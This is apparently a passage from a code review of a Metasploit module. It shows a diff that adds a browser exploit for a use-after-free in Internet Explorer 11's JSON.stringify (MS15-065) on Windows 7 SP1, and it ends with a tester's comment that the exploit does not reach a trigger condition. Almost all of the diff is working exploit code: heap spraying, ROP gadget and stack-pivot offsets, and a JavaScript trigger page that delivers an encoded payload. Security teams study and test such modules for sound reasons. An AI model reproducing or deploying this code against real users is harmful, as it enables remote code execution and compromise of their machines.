modules/exploits/windows/browser/ms15_065_json_stringify.rb

```diff
@@ -0,0 +1,358 @@
+          :ua_name     => Msf::HttpClients::IE,
+          :ua_ver      => '11.0',
+        },
+      'Payload' =>
+		{
+	  'BadChars'	=> "\x00\x0D\x0A"
+		},
+      'DefaultOptions' =>
+        {
+          'InitialAutoRunScript' => 'migrate -f',
+        },
+      'Targets'        =>
+        [
+          [ 'Windows 7 SP1 / IE 11', { } ],
+        ],
+      'Privileged'     => false,
+      'DisclosureDate' => "July 22, 2015",
+      'DefaultTarget'  => 0))
+  end
+
+  def get_payload(target_info)
+	code = payload.encoded
+	return code.unpack('C*').to_s()
+  end
+  
+  def get_exploit_html(cli, target_info)
+  
+	html = <<-FOO
+	<html>
+	<body>
+	<script>
+	ARR_SIZE = 3248;
+	first_gadget_offsets = [150104,149432,152680,3202586,214836,3204663,361185,285227,103426,599295,365261,226292,410596,180980,226276,179716,320389,175621,307381,792144,183476];
+	stackpivot_gadget_offsets = [122908,122236,125484,2461125,208055,1572649,249826,271042,98055,62564,162095,163090,340146,172265,163058,170761,258290,166489,245298,172955,82542];
+	first_gadget = [0x89, 0x41, 0x0c, 0xc3];
+	stackpivot_gadget = [0x94, 0xc3];
+	gadget_offsets = {"stackpivot": 0, "g1": 0, "g2": 0};
+
+	function empty_replacer(a,b) {
+		return b;
+	}
+
+	function create_list(lst, depth) {
+		if (depth > 5)
+		{
+			return;
+		}
+		else
+		{
+			// Creates 19 objects in each nested list
+			for (i = 0; i <= 19; i++)
+			{
+				// Create random string with length 8
+				for (var val = "", c = 0; c <= 8; c++) {
+					rnd = Math.floor((Math.random() * 90) + 48);
+					l = String.fromCharCode(rnd);
+					val = val + l;
+				}
+				lst["a" + i] = val;
+			}
+			create_list(lst["a0"] = {}, depth + 1);
+		}
+	}
+
+	function create_triggering_json() {
+		var lst = {}
+		create_list(lst, 0);
+		return lst;
+	}
+
+	// Create vulnerable JSON
+	trig_json = create_triggering_json();
+
+	spray = new Array(4096);
+	buff = new ArrayBuffer(4);
+	size = 0;
+
+	// Heap Spray
+	var I = setInterval(function(){     
+		for (i=0;i<400;i++,size++) {
+			spray[size] = new Array(15352);
+			for (j = 0; j< 85;j++) {
+				spray[size][j] = new Uint32Array(buff);
+			}
+			0 == i && (yb = spray[0][0]["length"], yb["toString"](16))
+		}
+		
+		size >= (4096) && (clearInterval(I), uaf())    
+	}, 100);
+
+	var arr = []
+	function uaf()
+	{
+		JSON.stringify(trig_json,empty_replacer);
+		
+		var pattern = [311357464,311357472,311357464];  
+		for (var b = 3248 * 2, c = 203; c < b; c++)
+			arr[c] = new ArrayBuffer(12);
+			
+		for (c = 203; c < b; c++)
+		{
+			var data = new Uint32Array(arr[c],0);
+			a = 0;
+			for (var i = data["length"] / pattern["length"]; a < i; a++)
+				for (var d=0, e = pattern["length"]; d < e;d++) 
+					data[a+d] = pattern[d];
+
+		}
+
+		CollectGarbage();
+
+		search_corrupted_array();
+	}
+
+	var damaged_array;
+	function search_corrupted_array()
+	{
+		for (i=0;i<4096;i++) 
+		{
+			for (j = 0; j< 85;j++) {
+				if (spray[i][j].length != 1)
```

Comment:
I am testing the exploit, and I noticed the exploit doesn't work for me because I never reach this condition. Thoughts?